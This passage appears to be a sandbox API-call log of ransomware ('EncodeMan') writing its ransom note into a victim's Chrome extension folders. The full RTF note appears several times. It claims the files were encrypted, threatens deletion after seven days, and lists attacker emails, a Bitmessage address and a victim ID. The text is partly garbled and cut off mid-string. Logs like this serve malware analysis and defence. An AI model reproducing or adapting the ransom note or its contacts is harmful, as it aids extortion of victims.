\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.843] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.844] CloseHandle (hObject=0x2ec) returned 1 [0284.844] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0284.844] GetLastError () returned 0x2 [0284.844] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.845] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.845] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.845] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an 